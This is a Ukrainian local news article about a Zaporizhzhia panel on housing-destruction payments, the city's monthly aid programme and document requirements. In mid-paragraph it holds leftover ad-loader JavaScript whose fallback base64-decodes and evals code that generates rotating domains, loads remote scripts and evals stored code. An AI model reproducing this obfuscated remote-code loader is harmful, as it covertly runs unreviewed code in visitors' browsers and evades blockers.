У Запоріжжі влада відповіла на питання громадськості щодо виплат за зруйноване житло (ФОТО)

Днями в Запоріжжі відбулась панельна дискусія за участі представників місцевої влади й громадськості, що була присвячена допомозі жителям, чиє житло було зруйноване внаслідок російської агресії.

Акцент побував на обговоренні цих проблем.

Що стало причиною зустрічі?

Причиною зустрічі став скандал, що розгорівся у мережі після прильоту ракети в будинок у Дніпрі. Так, люди порівняли допомогу постраждалим від обстрілів у Дніпрі й Запоріжжі й почали вимагати більш вагомої підтримки від запорізької влади.

Нагадаємо, що в Запоріжжі було досить багато «прильотів» у житлові багатоповерхові будинки й у приватний сектор. Ще в жовтні всіх вразили трагедії будинків на вул. Зестафонській, Незалежної України, проспекті Соборному й інші. Ракети зруйнували вщент цілі під’їзди, люди залишилися без домівок, під завалами знаходили тіла загиблих.

Однак запорізька влада не піднімала питання про компенсацію грошей за втрачене житло й запропонувала виплати, а також статус ВПО. Постраждалі від обстрілів запоріжці повідомляють про те, що від мерії отримали виплати 6 000 гривень і на цьому допомога закінчилась.

Як запоріжці можуть отримати матдопомогу?

Нещодавно, з 1 лютого, було запроваджено міську цільову програму, згідно з якою містяни, чиє житло було зруйноване, стало непридатним для проживання внаслідок російських обстрілів, мають змогу оформити щомісячну фінансову допомогу від міста у розмірі 10 тисяч гривень.

Запоріжці вже почали звертатись до ЦНАПів, зокрема й ті, чиє житло було зруйноване ще у жовтні минулого року. На зустрічі були присутні представники мерії, журналісти, й ті, хто постраждав від ракетних обстрілів.

Як виявилося, мешканці міста не задоволені бюрократичними нюансами, які заважають оформити виплати. Зокрема, мова йде про тих людей, які через стан здоров’я не можуть особисто відвідати ЦНАП та інші установи для отримання необхідних документів. Однак, на думку Юрія Швеця, директора департаменту соцзахисту, процес оформлення не можна назвати складним. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Є перелік документів, які необхідно надати. Ця допомога надається з моменту руйнації. Тобто люди, чиї будинки потраждали ще у жовтні отримають гроші за цей період. Однак при поданні документів у перший раз необхідна особиста присутність. Це може бути власник або уповноважена від нього особа, але потрібна нотаріально завірена довіреність, — пояснив Щвець.

Відомо, що матдопомога видаватиметься шляхом банківського переказу до Ощадбанку або за допомогою Укрпошти.

Ще одне питання виникло в тих мешканців, які втратили під час прильотів родичів, що проживали у квартирах багатоповерхівок чи приватних будинках. Справа в тому, що для подання заяви необхідно підтвердити право власності, однак інколи для цього людям спочатку треба звернутися до нотаріуса та заплатати йому чималі кошти (до 20 тисяч гривень, за словами присутніх на зустрічі). Окрім цього, на це потрібен час.

Якщо є один власник і інший, який загинув, то можна вступити в право власності через отримання спадщини й потім звернутися до ЦНАПУ, — відповів на це Швець.

Також він зауважив, що у випадку втрати фізичних документів, що підтверджують право власності, можна звернутися до ЦНАПу й зробити витяг з реєстру речових прав.

З залу пролунала пропозиція щодо того, щоб спростити процесс отримання допомоги й оформлювати виплати не за правом власності, а за пропискою. Однак представники влади на це не відреагували.

Що стосується відновлення будинків, то наразі розробляється проектно-кошторисна документація по кожній багатоповерхівці. Срок для їхньої розробки — червень 2023 року, так повідомили в мерії. (adsbygoogle = window.adsbygoogle || []).push({});

«Вибухи для дитини довго були громом»: як у Запоріжжі адаптуються до неспокійного життя Підписуйтесь на Акцент в Источник: https://akzent.zp.ua/u-zaporizhzhi-vlada-vidpovila-na-pitannya-gromadskosti-shhodo-viplat-za-zrujnovane-zhitlo-foto/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

нет
scroll to top